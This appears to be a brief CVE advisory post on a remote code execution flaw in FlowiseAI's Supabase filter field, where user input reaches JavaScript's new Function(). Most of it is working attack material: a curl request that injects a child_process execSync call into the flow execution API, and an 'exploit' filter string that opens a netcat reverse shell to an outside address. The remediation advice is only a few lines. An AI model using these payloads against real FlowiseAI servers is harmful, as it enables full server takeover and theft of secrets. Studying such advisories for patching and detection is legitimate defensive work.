FlowiseAI, Remote Code Execution, CVE-2024-37080 (Critical)

Listen to this Post

The vulnerability exists within the `Supabase.ts` component of FlowiseAI. An authenticated admin user can supply a malicious string to the ‘Supabase RPC Filter’ configuration field. This user-controlled input (supabaseRPCFilter) is passed directly to the JavaScript `new Function()` constructor on line 237 of the specified file without any sanitization or sandboxing. This dynamically creates and executes a function. An attacker can craft a payload that breaks out of the intended filter logic and calls `process.mainModule.require()` to import the native ‘child_process’ module. By calling `execSync()` on this module, any arbitrary operating system command can be executed with the privileges of the FlowiseAI backend server, leading to full system compromise.
Platform: FlowiseAI
Version: <=1.4.1
Vulnerability: RCE
Severity: Critical

date: 2024-06-05

Prediction: Patch by 2024-06-19

What Undercode Say:

curl -s http://localhost:3000/api/v1/flow/execute -H "Authorization: Bearer <JWT>" -H "Content-Type: application/json" -d '{"flowId":"...","inputValue":"...","supabaseRPCFilter":"filter(process.mainModule.require(\\"child_process\\").execSync(\\"id\\"), \\"gt\\", 5)"}'
// packages/components/nodes/vectorstores/Supabase/Supabase.tsL237
const filter = new Function('fn', 'query', <code>return query.${supabaseRPCFilter}</code>);

How Exploit:

Inject filter expression:

`filter(process.mainModule.require(“child_process”).execSync(“nc 192.168.1.1 4444 -e /bin/sh”), “gt”, 5)`

Protection from this CVE

Update to version 1.4.2.

Sanitize user input.

Implement sandboxing.

Impact:

Remote Code Execution

Secrets Disclosure

System Compromise

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top